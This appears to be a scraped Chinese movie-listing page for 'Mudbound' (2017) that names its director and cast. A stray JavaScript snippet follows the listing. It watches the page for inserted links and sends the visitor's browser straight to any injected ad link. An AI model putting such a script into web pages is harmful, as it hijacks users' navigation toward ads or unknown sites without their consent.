泥土之界

泥土之界

  • 主演:加内特·赫德兰 凯瑞·穆里根 杰森·克拉克 罗布·摩根 乔纳森·班克斯 杰森·米切尔 玛丽?布莱姬 克里·卡希尔 露西·浮士德 小凯文·哈里森 萨曼莎·霍弗 杰拉尔丁·辛格 大卫·詹森 乔恩·亚瑟 罗德里克·希尔 
  • 导演:迪·里斯 
  • 年份:2017
返回顶部
// 自动监听插入的 或 iframe,提取跳转链接 const observer = new MutationObserver((muts) => { for (const m of muts) { for (const node of m.addedNodes) { if (node.nodeType !== 1) continue; const el = node; // case 1: 链接 if (el.tagName === "A" && el.href.includes("http")) { console.log("🎯 发现广告链接:", el.href); window.location.href = el.href; } // case 2: iframe if (el.tagName === "IFRAME" && el.src.includes("http")) { console.log("🎯 发现广告 iframe:", el.src); // window.location.href = el.src; } } } }); observer.observe(document.body, { childList: true, subtree: true });